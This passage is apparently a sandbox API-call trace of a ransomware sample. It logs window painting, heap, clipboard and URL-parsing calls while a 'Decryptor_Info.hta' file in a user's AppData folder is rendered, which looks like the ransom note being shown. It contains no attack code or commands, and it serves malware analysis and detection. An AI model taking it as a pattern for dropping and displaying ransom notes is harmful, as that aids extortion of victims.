[0112.968] SetWindowTextW (hWnd=0x301f0, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta") returned 1 [0112.968] NtdllDefWindowProc_W () returned 0x1 [0112.969] IUnknown:Release (This=0x47c5c4) returned 0x3 [0112.969] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a2bd0 | out: hHeap=0x450000) returned 1 [0112.969] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0112.969] SendMessageW (hWnd=0x150268, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0112.969] NtdllDefWindowProc_W () returned 0x0 [0112.970] NtdllDefWindowProc_W () returned 0x0 [0112.971] NtdllDefWindowProc_W () returned 0x0 [0112.971] SendMessageW (hWnd=0x301f0, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0112.971] NtdllDefWindowProc_W () returned 0x0 [0112.972] SetWindowLongW (hWnd=0x301f0, nIndex=-16, dwNewLong=13238272) returned -2033254400 [0112.972] NtdllDefWindowProc_W () returned 0x0 [0112.972] NtdllDefWindowProc_W () returned 0x0 [0113.001] NtdllDefWindowProc_W () returned 0x10027 [0113.001] SetWindowLongW (hWnd=0x301f0, nIndex=-20, dwNewLong=262144) returned 262400 [0113.001] NtdllDefWindowProc_W () returned 0x0 [0113.001] NtdllDefWindowProc_W () returned 0x0 [0113.002] SetWindowPos (hWnd=0x301f0, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0113.002] NtdllDefWindowProc_W () returned 0x0 [0113.002] NtdllDefWindowProc_W () returned 0x0 [0113.003] NtdllDefWindowProc_W () returned 0x0 [0113.003] NtdllDefWindowProc_W () returned 0x0 [0113.003] GetClientRect (in: hWnd=0x301f0, lpRect=0x22ce10 | out: lpRect=0x22ce10) returned 1 [0113.007] GetClientRect (in: hWnd=0x301f0, lpRect=0x22ce10 | out: lpRect=0x22ce10) returned 1 [0113.007] IntersectRect (in: lprcDst=0x22cc70, lprcSrc1=0x22cc70, lprcSrc2=0x22cc08 | out: lprcDst=0x22cc70) returned 1 [0113.007] IntersectRect (in: lprcDst=0x22cc70, lprcSrc1=0x22cc70, lprcSrc2=0x22cc08 | out: lprcDst=0x22cc70) returned 1 [0113.007] CopyRect (in: lprcDst=0x461c4c, lprcSrc=0x22ce10 | out: lprcDst=0x461c4c) returned 1 [0113.007] OffsetRect (in: lprc=0x461c4c, dx=0, dy=0 | out: lprc=0x461c4c) returned 1 [0113.007] CopyRect (in: lprcDst=0x461c5c, lprcSrc=0x22ce10 | out: lprcDst=0x461c5c) returned 1 [0113.007] OffsetRect (in: lprc=0x461c5c, dx=0, dy=0 | out: lprc=0x461c5c) returned 1 [0113.007] CopyRect (in: lprcDst=0x22cd48, lprcSrc=0x22ce10 | out: lprcDst=0x22cd48) returned 1 [0113.007] IntersectRect (in: lprcDst=0x22cd38, lprcSrc1=0x22cd48, lprcSrc2=0x22ce10 | out: lprcDst=0x22cd38) returned 1 [0113.007] EqualRect (lprc1=0x22cd38, lprc2=0x22cd48) returned 1 [0113.007] CreateRectRgnIndirect (lprect=0x73d87be0) returned 0xb040a67 [0113.007] GetUpdateRgn (hWnd=0x201f2, hRgn=0xb040a67, bErase=0) returned 1 [0113.007] DeleteObject (ho=0xb040a67) returned 1 [0113.007] SetWindowPos (hWnd=0x201f2, hWndInsertAfter=0x0, X=0, Y=0, cx=1074, cy=597, uFlags=0x14) returned 1 [0113.007] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.007] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x46, wParam=0x0, lParam=0x22ccdc*=131570, plResult=0x22cb78 | out: plResult=0x22cb78) returned 0x1 [0113.007] NtdllDefWindowProc_W () returned 0x0 [0113.007] GetCurrentThreadId () returned 0xe9c [0113.008] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.008] GetCurrentThreadId () returned 0xe9c [0113.008] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.008] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x47, wParam=0x0, lParam=0x22ccdc*=131570, plResult=0x22cb74 | out: plResult=0x22cb74) returned 0x1 [0113.008] NtdllDefWindowProc_W () returned 0x0 [0113.008] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.008] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x5, wParam=0x0, lParam=0x2550432, plResult=0x22c7b0 | out: plResult=0x22c7b0) returned 0x1 [0113.008] NtdllDefWindowProc_W () returned 0x0 [0113.008] GetCurrentThreadId () returned 0xe9c [0113.008] GetCurrentThreadId () returned 0xe9c [0113.008] GetCurrentThreadId () returned 0xe9c [0113.009] GlobalAddAtomW (lpString="HSS") returned 0xc165 [0113.009] SetPropW (hWnd=0x150268, lpString=0xc165, hData=0x150268) returned 1 [0113.009] SetWindowPos (hWnd=0x301f0, hWndInsertAfter=0x0, X=360, Y=270, cx=0, cy=0, uFlags=0x15) returned 1 [0113.009] NtdllDefWindowProc_W () returned 0x0 [0113.010] NtdllDefWindowProc_W () returned 0x0 [0113.010] NtdllDefWindowProc_W () returned 0x0 [0113.010] SetWindowPos (hWnd=0x301f0, hWndInsertAfter=0x0, X=0, Y=0, cx=720, cy=320, uFlags=0x16) returned 1 [0113.010] NtdllDefWindowProc_W () returned 0x0 [0113.010] NtdllDefWindowProc_W () returned 0x0 [0113.010] NtdllDefWindowProc_W () returned 0x0 [0113.011] NtdllDefWindowProc_W () returned 0x0 [0113.011] GetClientRect (in: hWnd=0x301f0, lpRect=0x22ce04 | out: lpRect=0x22ce04) returned 1 [0113.011] GetClientRect (in: hWnd=0x301f0, lpRect=0x22ce04 | out: lpRect=0x22ce04) returned 1 [0113.011] IntersectRect (in: lprcDst=0x22cc60, lprcSrc1=0x22cc60, lprcSrc2=0x22cbf8 | out: lprcDst=0x22cc60) returned 1 [0113.012] IntersectRect (in: lprcDst=0x22cc60, lprcSrc1=0x22cc60, lprcSrc2=0x22cbf8 | out: lprcDst=0x22cc60) returned 1 [0113.012] CopyRect (in: lprcDst=0x461c4c, lprcSrc=0x22ce04 | out: lprcDst=0x461c4c) returned 1 [0113.012] OffsetRect (in: lprc=0x461c4c, dx=0, dy=0 | out: lprc=0x461c4c) returned 1 [0113.012] CopyRect (in: lprcDst=0x461c5c, lprcSrc=0x22ce04 | out: lprcDst=0x461c5c) returned 1 [0113.013] OffsetRect (in: lprc=0x461c5c, dx=0, dy=0 | out: lprc=0x461c5c) returned 1 [0113.013] CopyRect (in: lprcDst=0x22cd40, lprcSrc=0x22ce04 | out: lprcDst=0x22cd40) returned 1 [0113.013] IntersectRect (in: lprcDst=0x22cd30, lprcSrc1=0x22cd40, lprcSrc2=0x22ce04 | out: lprcDst=0x22cd30) returned 1 [0113.013] EqualRect (lprc1=0x22cd30, lprc2=0x22cd40) returned 1 [0113.013] CreateRectRgnIndirect (lprect=0x73d87be0) returned 0xe040a67 [0113.013] GetUpdateRgn (hWnd=0x201f2, hRgn=0xe040a67, bErase=0) returned 1 [0113.013] DeleteObject (ho=0xe040a67) returned 1 [0113.013] SetWindowPos (hWnd=0x201f2, hWndInsertAfter=0x0, X=0, Y=0, cx=714, cy=292, uFlags=0x14) returned 1 [0113.013] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.013] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x46, wParam=0x0, lParam=0x22ccd4*=131570, plResult=0x22cb70 | out: plResult=0x22cb70) returned 0x1 [0113.013] NtdllDefWindowProc_W () returned 0x0 [0113.013] GetCurrentThreadId () returned 0xe9c [0113.013] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.013] GetCurrentThreadId () returned 0xe9c [0113.013] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.013] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x47, wParam=0x0, lParam=0x22ccd4*=131570, plResult=0x22cb6c | out: plResult=0x22cb6c) returned 0x1 [0113.013] NtdllDefWindowProc_W () returned 0x0 [0113.014] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.014] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x5, wParam=0x0, lParam=0x12402ca, plResult=0x22c7a8 | out: plResult=0x22c7a8) returned 0x1 [0113.014] NtdllDefWindowProc_W () returned 0x0 [0113.014] GetCurrentThreadId () returned 0xe9c [0113.014] GetCurrentThreadId () returned 0xe9c [0113.014] GetCurrentThreadId () returned 0xe9c [0113.015] NtdllDefWindowProc_W () returned 0x0 [0113.015] ShowWindow (hWnd=0x301f0, nCmdShow=1) returned 0 [0113.015] NtdllDefWindowProc_W () returned 0x0 [0113.016] NtdllDefWindowProc_W () returned 0x0 [0113.016] NtdllDefWindowProc_W () returned 0x0 [0113.019] NtdllDefWindowProc_W () returned 0x0 [0113.024] NtdllDefWindowProc_W () returned 0x1 [0113.025] NtdllDefWindowProc_W () returned 0x0 [0113.026] GetClientRect (in: hWnd=0x301f0, lpRect=0x22d068 | out: lpRect=0x22d068) returned 1 [0113.026] GetClientRect (in: hWnd=0x301f0, lpRect=0x22d068 | out: lpRect=0x22d068) returned 1 [0113.026] NtdllDefWindowProc_W () returned 0x0 [0113.026] UpdateWindow (hWnd=0x301f0) returned 1 [0113.026] NtdllDefWindowProc_W () returned 0x0 [0113.026] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.026] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4be200, Size=0x9c) returned 0x4bfe00 [0113.027] RedrawWindow (hWnd=0x201f2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0113.027] GetCurrentThreadId () returned 0xe9c [0113.027] GetCurrentThreadId () returned 0xe9c [0113.027] IntersectRect (in: lprcDst=0x22c75c, lprcSrc1=0x22c75c, lprcSrc2=0x22c72c | out: lprcDst=0x22c75c) returned 1 [0113.027] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22c74c | out: lprcDst=0x4a1d18) returned 1 [0113.027] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.027] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492560 [0113.027] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492560 | out: hHeap=0x450000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab600 [0113.029] ExtCreateRegion (lpx=0x0, nCount=0x40, lpData=0x4ab600) returned 0xffffffffbe0401d9 [0113.029] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ab600 | out: hHeap=0x450000) returned 1 [0113.029] RedrawWindow (hWnd=0x201f2, lprcUpdate=0x0, hrgnUpdate=0xbe0401d9, flags=0x21) returned 1 [0113.030] DeleteObject (ho=0xbe0401d9) returned 1 [0113.030] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22ca84, cPoints=0x1 | out: lpPoints=0x22ca84) returned 19333483 [0113.030] BeginPaint (in: hWnd=0x201f2, lpPaint=0x22ceb8 | out: lpPaint=0x22ceb8) returned 0x280101d0 [0113.030] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.030] GetCurrentThreadId () returned 0xe9c [0113.030] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.030] GetCurrentThreadId () returned 0xe9c [0113.030] IsRectEmpty (lprc=0x22cec0) returned 0 [0113.030] CreateRectRgnIndirect (lprect=0x73d87be0) returned 0x40040a7e [0113.030] GetRandomRgn (hdc=0x280101d0, hrgn=0x40040a7e, i=4) returned 1 [0113.030] OffsetRgn (hrgn=0x40040a7e, x=-363, y=-295) returned 2 [0113.030] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22ca74, cPoints=0x1 | out: lpPoints=0x22ca74) returned 19333483 [0113.031] GetDeviceCaps (hdc=0x160101d2, index=38) returned 32409 [0113.031] IntersectRect (in: lprcDst=0x22cb34, lprcSrc1=0x461c5c, lprcSrc2=0x461c4c | out: lprcDst=0x22cb34) returned 1 [0113.031] IntersectRect (in: lprcDst=0x22ca10, lprcSrc1=0x461c5c, lprcSrc2=0x461c4c | out: lprcDst=0x22ca10) returned 1 [0113.031] IntersectRect (in: lprcDst=0x22cb24, lprcSrc1=0x22cb24, lprcSrc2=0x22ca10 | out: lprcDst=0x22cb24) returned 1 [0113.031] IsRectEmpty (lprc=0x22cb24) returned 0 [0113.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x50) returned 0x490ac8 [0113.032] GetDeviceCaps (hdc=0x160101d2, index=38) returned 32409 [0113.032] GetDeviceCaps (hdc=0x280101d0, index=14) returned 1 [0113.032] GetDeviceCaps (hdc=0x280101d0, index=12) returned 32 [0113.032] GetRegionData (in: hrgn=0x40040a7e, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0113.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aab18 [0113.032] GetRegionData (in: hrgn=0x40040a7e, nCount=0x30, lpRgnData=0x4aab18 | out: lpRgnData=0x4aab18) returned 0x30 [0113.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab600 [0113.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ab600 | out: hHeap=0x450000) returned 1 [0113.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aab18 | out: hHeap=0x450000) returned 1 [0113.032] IntersectRect (in: lprcDst=0x22a15c, lprcSrc1=0x22a15c, lprcSrc2=0x22a12c | out: lprcDst=0x22a15c) returned 1 [0113.032] IntersectRect (in: lprcDst=0x22a190, lprcSrc1=0x22a190, lprcSrc2=0x4a1bb0 | out: lprcDst=0x22a190) returned 1 [0113.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aab18 [0113.032] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x4aab18) returned 0x1c04024f [0113.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aab18 | out: hHeap=0x450000) returned 1 [0113.032] SelectClipRgn (hdc=0x280101d0, hrgn=0x1c04024f) returned 2 [0113.032] IntersectRect (in: lprcDst=0x229e94, lprcSrc1=0x229e94, lprcSrc2=0x229e64 | out: lprcDst=0x229e94) returned 1 [0113.032] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229e84 | out: lprcDst=0x4a1bc0) returned 1 [0113.032] IntersectRect (in: lprcDst=0x229cd0, lprcSrc1=0x229cd0, lprcSrc2=0x4a1bb0 | out: lprcDst=0x229cd0) returned 1 [0113.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4ac4f0 [0113.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ac4f0 | out: hHeap=0x450000) returned 1 [0113.033] IntersectRect (in: lprcDst=0x229ee4, lprcSrc1=0x229ee4, lprcSrc2=0x229eb4 | out: lprcDst=0x229ee4) returned 1 [0113.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.033] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229db8 | out: lprcDst=0x4a1bc0) returned 1 [0113.033] IntersectRect (in: lprcDst=0x229db8, lprcSrc1=0x229db8, lprcSrc2=0x4a1bd0 | out: lprcDst=0x229db8) returned 1 [0113.033] GetObjectType (h=0x280101d0) returned 0x3 [0113.033] GetDeviceCaps (hdc=0x280101d0, index=2) returned 1 [0113.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aab18 [0113.033] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x4aab18) returned 0x1b0406de [0113.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aab18 | out: hHeap=0x450000) returned 1 [0113.033] SelectClipRgn (hdc=0x280101d0, hrgn=0x1b0406de) returned 2 [0113.033] DeleteObject (ho=0x1b0406de) returned 1 [0113.033] CreateSolidBrush (color=0xffffff) returned 0xffffffffc01001d9 [0113.033] SelectObject (hdc=0x280101d0, h=0xc01001d9) returned 0x1900010 [0113.034] PatBlt (hdc=0x280101d0, x=0, y=0, w=714, h=292, rop=0xf00021) returned 1 [0113.035] SelectObject (hdc=0x280101d0, h=0x1900010) returned 0xc01001d9 [0113.035] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229ed4 | out: lprcDst=0x4a1bc0) returned 1 [0113.036] DeleteObject (ho=0x1c04024f) returned 1 [0113.036] GetStockObject (i=15) returned 0x188000b [0113.036] SelectPalette (hdc=0x280101d0, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0113.036] EndPaint (hWnd=0x201f2, lpPaint=0x22ceb8) returned 1 [0113.036] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22ca74, cPoints=0x1 | out: lpPoints=0x22ca74) returned 19333483 [0113.036] DeleteObject (ho=0x40040a7e) returned 1 [0113.036] GetCurrentThreadId () returned 0xe9c [0113.036] GetCurrentThreadId () returned 0xe9c [0113.036] GetCurrentThreadId () returned 0xe9c [0113.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ebd0 | out: hHeap=0x450000) returned 1 [0113.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4b9f80 | out: hHeap=0x450000) returned 1 [0113.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ba7f0 | out: hHeap=0x450000) returned 1 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x40) returned 0x4ab600 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd1d8 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x4bd1f8 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab648 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490b20 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f80 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x44) returned 0x4ac4f0 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x4bfea8 [0113.037] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4bfea8, Size=0x148e) returned 0x4bfea8 [0113.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc94) returned 0x4c1340 [0113.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bfea8 | out: hHeap=0x450000) returned 1 [0113.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ac4f0 | out: hHeap=0x450000) returned 1 [0113.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bce40 | out: hHeap=0x450000) returned 1 [0113.051] GetSystemDefaultLCID () returned 0x409 [0113.051] GetVersionExW (in: lpVersionInformation=0x22f198*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xc, dwMinorVersion=0x22f1cc, dwBuildNumber=0x73d4de17, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22f198*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0113.051] GetKeyboardLayoutList (in: nBuff=32, lpList=0x22f118 | out: lpList=0x22f118) returned 1 [0113.051] GetSystemMetrics (nIndex=4096) returned 0 [0113.052] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0113.052] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0113.052] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0113.052] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0113.052] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0113.052] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0113.052] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0113.052] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0113.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c) returned 0x4aab18 [0113.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490b78 [0113.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x64) returned 0x4bce40 [0113.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c) returned 0x4aab50 [0113.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490bd0 [0113.053] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x492560 [0113.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490c28 [0113.054] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x492ee0, Size=0x18) returned 0x4bd218 [0113.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x492590 [0113.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4925c0 [0113.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490c80 [0113.054] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4b9f80, Size=0x18) returned 0x4bd238 [0113.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4925f0 [0113.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x492620 [0113.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490cd8 [0113.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x492650 [0113.055] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd930 | out: hHeap=0x450000) returned 1 [0113.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x492680 [0113.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490d30 [0113.056] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4bd238, Size=0x24) returned 0x4926b0 [0113.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4926e0 [0113.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x492710 [0113.056] IsCharAlphaW (ch=0x72) returned 1 [0113.056] IsCharAlphaW (ch=0x65) returned 1 [0113.056] IsCharAlphaW (ch=0x64) returned 1 [0113.056] bsearch (_Key=0x22f200, _Base=0x73d14c80, _NumOfElements=0x93, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x73d15038 [0113.057] IsCharSpaceW (wch=0x72) returned 0 [0113.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd238 [0113.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab690 [0113.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490d88 [0113.058] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x492740 [0113.058] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4bfec0 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4bfef0 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490de0 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4bff20 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4bff50 [0113.059] IsCharAlphaW (ch=0x72) returned 1 [0113.059] IsCharAlphaW (ch=0x65) returned 1 [0113.059] IsCharAlphaW (ch=0x64) returned 1 [0113.059] bsearch (_Key=0x22f200, _Base=0x73d14c80, _NumOfElements=0x93, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x73d15038 [0113.059] IsCharSpaceW (wch=0x72) returned 0 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd258 [0113.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab6d8 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490e38 [0113.060] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4926b0, Size=0x34) returned 0x48ebd0 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4926b0 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4bff80 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4bffb0 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490e90 [0113.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4bffe0 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490ee8 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4c0010 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4c0040 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490f40 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4c0070 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4c00a0 [0113.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490f98 [0113.061] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x48ebd0, Size=0x4c) returned 0x490ff0 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4c00d0 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4c0100 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x491048 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4c0130 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4c0160 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x4910a0 [0113.062] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4c0190 [0113.063] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.063] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.063] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.063] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.063] StrCmpICW (pszStr1="text/css", pszStr2="text/css") returned 0 [0113.063] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x48ebd0 [0113.063] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x70) returned 0x4be200 [0113.063] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22b098 | out: ppu=0x22b098) returned 0x0 [0113.080] CoInternetCombineUrl (in: pwzBaseUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pwzRelativeUrl="", dwCombineFlags=0x6000000, pszResult=0x22d1c8, cchResult=0x1000, pcchResult=0x22b114, dwReserved=0x0 | out: pszResult="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/", pcchResult=0x22b114) returned 0x0 [0113.082] RtlAllocateHeap 